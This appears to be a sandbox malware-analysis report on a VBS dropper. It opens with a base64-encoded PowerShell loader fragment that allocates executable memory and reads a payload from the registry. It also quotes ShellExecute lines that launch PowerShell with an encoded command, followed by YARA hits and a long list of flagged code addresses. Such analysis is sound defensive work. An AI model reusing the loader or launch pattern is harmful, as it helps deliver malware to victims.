QBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Intercompa.ShellExecute Numb5, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
Source: Initial file: Intercompa.ShellExecute Klagenspar, "-NoExit -EncodedCommand " & chr(34) & Svine & chr(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3956
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3968
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3956 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3968 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3968
Yara signature match
Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7848, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 3564, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04418028 4_2_04418028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0441801B 4_2_0441801B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0441E978 4_2_0441E978
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_070A80E8 4_2_070A80E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_070A80F8 4_2_070A80F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F2A150 4_2_07F2A150
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F273A8 4_2_07F273A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F2E368 4_2_07F2E368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F23198 4_2_07F23198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F23188 4_2_07F23188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F752C0 4_2_07F752C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F752B0 4_2_07F752B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F70040 4_2_07F70040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F70007 4_2_07F70007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F81008 4_2_07F81008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F837F8 4_2_07F837F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F837F7 4_2_07F837F7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F81F47 4_2_07F81F47
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC0040 4_2_07FC0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8798 4_2_07FC8798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8793 4_2_07FC8793
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0851F8D0 4_2_0851F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0851E1E0 4_2_0851E1E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085977F0 4_2_085977F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08599428 4_2_08599428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0859AD08 4_2_0859AD08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E8258 4_2_085E8258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E9788 4_2_085E9788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085EB860 4_2_085EB860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E4180 4_2_085E4180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E9220 4_2_085E9220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E4AC8 4_2_085E4AC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E4AB8 4_2_085E4AB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E4AA0 4_2_085E4AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085EC3C8 4_2_085EC3C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085EDC60 4_2_085EDC60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085EA480 4_2_085EA480
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085EE4A0 4_2_085EE4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085ECEC0 4_2_085ECEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08602998 4_2_08602998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08604660 4_2_08604660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08604308 4_2_08604308
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_085E0081 4_2_085E0081
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_3_02DF2337 17_3_02DF2337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_043BA640 21_2_043BA640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_043BA614 21_2_043BA614
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_043B48F8 21_2_043B48F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_043BEAF8 21_2_043BEAF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_043BEAE9 21_2_043BEAE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_043B338E 21_2_043B338E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D49270 21_2_07D49270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D49260 21_2_07D49260
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D40040 21_2_07D40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D40006 21_2_07D40006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D5F2E3 21_2_07D5F2E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D60040 21_2_07D60040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D652F8 21_2_07D652F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D652E8 21_2_07D652E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D60007 21_2_07D60007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07DB0448 21_2_07DB0448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07DB3630 21_2_07DB3630
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07DB3621 21_2_07DB3621
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0803A3B0 21_2_0803A3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0803A3C0 21_2_0803A3C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0803F440 21_2_0803F440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083EA420 21_2_083EA420
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083E9608 21_2_083E9608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083E44E0 21_2_083E44E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083E44D0 21_2_083E44D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083F7858 21_2_083F7858
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083F1042 21_2_083F1042
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083F1E68 21_2_083F1E68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083F1E58 21_2_083F1E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_083F47F0 21_2_083F47F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_08476138 21_2_08476138
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084770C8 21_2_084770C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_08479888 21_2_08479888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0847AC48 21_2_0847AC48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084724C8 21_2_084724C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_08472DC8 21_2_08472DC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0847CDE0 21_2_0847CDE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0847C660 21_2_0847C660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0847D620 21_2_0847D620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_08477780 21_2_08477780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_0847B788 21_2_0847B788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084907A0 21_2_084907A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084A9A60 21_2_084A9A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084AAEE0 21_2_084AAEE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084A58E8 21_2_084A58E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084A52C8 21_2_084A52C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_084AC480 21_2_084AC480
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07DBD8C1 21_2_07DBD8C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_031D9D70 25_2_031D9D70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_031DAA88 25_2_031DAA88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04D98FF8 25_2_04D98FF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04D98FF3 25_2_04D98FF3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04D9E8C0 25_2_04D9E8C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04D9E8B1 25_2_04D9E8B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_088A8D80 25_2_088A8D80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_088A8D50 25_2_088A8D50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_088A0006 25_2_088A0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_088A0040 25_2_088A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0899EC78 25_2_0899EC78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0899A708 25_2_0899A708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0899D268 25_2_0899D268
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0899CD88 25_2_0899CD88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0899BFE8 25_2_0899BFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0899472C 25_2_0899472C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D9A78 25_2_089D9A78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D6E88 25_2_089D6E88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D4F40 25_2_089D4F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089DB0D0 25_2_089DB0D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D0040 25_2_089D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089DB4D0 25_2_089DB4D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D717B 25_2_089D717B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089DB0D0 25_2_089DB0D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D9720 25_2_089D9720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C8D060 25_2_08C8D060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C8D980 25_2_08C8D980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C895E0 25_2_08C895E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C83588 25_2_08C83588
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C87DB8 25_2_08C87DB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C8A688 25_2_08C8A688
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C846A8 25_2_08C846A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C88FD8 25_2_08C88FD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C8BFB8 25_2_08C8BFB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C8C768 25_2_08C8C768
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C8B708 25_2_08C8B708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C93A0F 25_2_08C93A0F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C93A10 25_2_08C93A10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C90448 25_2_08C90448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C90458 25_2_08C90458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08C9D679 25_2_08C9D679
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08CAD028 25_2_08CAD028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08CA8D68 25_2_08CA8D68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08CAEF40 25_2_08CAEF40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08CA3880 25_2_08CA3880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08CA3871 25_2_08CA3871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08CA5DC8 25_2_08CA5DC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D795A8 25_2_08D795A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D776E0 25_2_08D776E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D7AF40 25_2_08D7AF40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D78208 25_2_08D78208
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D7C490 25_2_08D7C490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D7E6D8 25_2_08D7E6D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08D7F7E8 25_2_08D7F7E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DB0AD0 25_2_08DB0AD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DCA0B8 25_2_08DCA0B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DCC200 25_2_08DCC200
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DCB5B0 25_2_08DCB5B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DDD9C8 25_2_08DDD9C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DDCD63 25_2_08DDCD63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DDE2FA 25_2_08DDE2FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DDF3E0 25_2_08DDF3E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DDF3D5 25_2_08DDF3D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08DD94B0 25_2_08DD94B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E05091 25_2_08E05091
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E0A390 25_2_08E0A390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E0DC51 25_2_08E0DC51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E095C0 25_2_08E095C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E0BFF0 25_2_08E0BFF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E05091 25_2_08E05091
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E09CA2 25_2_08E09CA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E7DDB8 25_2_08E7DDB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E785C0 25_2_08E785C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08E77648 25_2_08E77648
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC0040 25_2_08EC0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC71C8 25_2_08EC71C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC71B9 25_2_08EC71B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC4518 25_2_08EC4518
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC4AC0 25_2_08EC4AC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC4A80 25_2_08EC4A80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC71C8 25_2_08EC71C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FBC4A8 25_2_08FBC4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FBCF00 25_2_08FBCF00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC09B3 25_2_08FC09B3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC495D 25_2_08FC495D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2D3D 25_2_08FC2D3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC3CFF 25_2_08FC3CFF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC1DE5 25_2_08FC1DE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC58C5 25_2_08FC58C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC58C2 25_2_08FC58C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC57A5 25_2_08FC57A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC278F 25_2_08FC278F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC4F82 25_2_08FC4F82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC4883 25_2_08FC4883
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC543B 25_2_08FC543B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2530 25_2_08FC2530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2A12 25_2_08FC2A12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC520F 25_2_08FC520F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC1B0A 25_2_08FC1B0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2B04 25_2_08FC2B04
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08EC0006 25_2_08EC0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_089D2880 25_2_089D2880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_02B097A8 26_2_02B097A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_02B0A48D 26_2_02B0A48D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_02B0A8C8 26_2_02B0A8C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_04B69008 26_2_04B69008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_04B68FF8 26_2_04B68FF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_04B6E8D8 26_2_04B6E8D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_04B6E8C9 26_2_04B6E8C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_07EC22A0 26_2_07EC22A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_07EC2293 26_2_07EC2293
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_07EC5A88 26_2_07EC5A88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_07EC5A84 26_2_07EC5A84
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_081F8C18 26_2_081F8C18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_081F8C40 26_2_081F8C40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_081F0006 26_2_081F0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_081F0040 26_2_081F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0826F618 26_2_0826F618
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082616C8 26_2_082616C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08288988 26_2_08288988
